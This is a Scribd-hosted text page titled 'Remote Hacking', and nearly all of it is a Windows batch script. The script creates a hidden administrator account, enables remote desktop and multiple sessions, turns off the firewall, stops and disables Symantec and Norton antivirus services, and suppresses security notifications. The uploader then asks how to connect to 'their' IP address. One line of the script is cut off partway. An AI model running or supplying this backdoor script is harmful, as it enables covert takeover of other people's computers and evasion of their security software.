0% found this document useful (0 votes)
885 views

Remote Hacking

The document contains commands to add a new user account and grant it administrator privileges, disable security and antivirus software services and notifications, and modify registry settings to allow remote desktop connections and multiple terminal server sessions while disabling firewall and user account protections. It also asks if anything else needs to be added and how to connect remotely by IP address and port number.

Uploaded by

berthol8942
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
885 views

Remote Hacking

The document contains commands to add a new user account and grant it administrator privileges, disable security and antivirus software services and notifications, and modify registry settings to allow remote desktop connections and multiple terminal server sessions while disabling firewall and user account protections. It also asks if anything else needs to be added and how to connect remotely by IP address and port number.

Uploaded by

berthol8942
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

@echo off net users /add "Username" "Password" net localgroup Administrators /add "Username" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows

NT\CurrentVersion\Winlogo n\SpecialAccounts\UserList" /v "Username" /t REG_DWORD /d 00000000 /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Ex plorer" /v NoClose /t REG_DWORD /d 1 /f reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Sy stem" /v DisableRegistryTools /t REG_DWORD /d 1 /f reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Serv ices" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f reg add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core" /v En ableConcurrentSessions /d 1 /t REG_DWORD /f >nul reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableCo ncurrentSessions /d 1 /t REG_DWORD /f > nul reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllowMul tipleTSSessions /d 1 /t REG_DWORD /f > nul net stop wscsvc reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v forceguest /t REG_DWORD /d 00000001 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc" /v Start /t RE G_DWORD /d 0x4 /f reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v AntiVirusDisa bleNotify /t REG_DWORD /d 00000001 /f reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v FirewallDisab leNotify /t REG_DWORD /d 00000001 /f reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v UpdatesDisabl eNotify /t REG_DWORD /d 00000001 /f reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v FirewallOverr ide /t REG_DWORD /d 00000001 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameter s\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 00000000 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameter s\FirewallPolicy\StandardProfile" /v DoNotAllowExceptions /t REG_DWORD /d 000000 01 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameter s\FirewallPolicy\StandardProfile" /v DisableNotifications /t REG_DWORD /d 000000 01 /f net stop sbservice net stop "Symantec Core LC" net stop "ccEvtMgr" net stop "ccPwdSvc" net stop "Speed Disk Service" net stop "NPFMntor"

net stop "NSCService" reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\navapsvc" /v Start /t REG_DWORD /d 00000004 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\GhostStartService" /v Start /t REG_DWORD /d 00000004 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NProtectService" /v St art /t REG_DWORD /d 00000004 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVScan" /v Start /t R EG_DWORD /d 00000004 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SBService" /v Start /t REG_DWORD /d 00000004 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Symantec Core LC" /v S tart /t REG_DWORD /d 00000004 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ccEvtMgr" /v Start /t REG_DWORD /d 00000004 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ccPwdSvc" /v Start /t REG_DWORD /d 00000004 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\S reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 00000000 /fPlease help me out, is there anythin g else i will need to add? And with remote dekstop do i just type in their ip ad ress and port number?

You might also like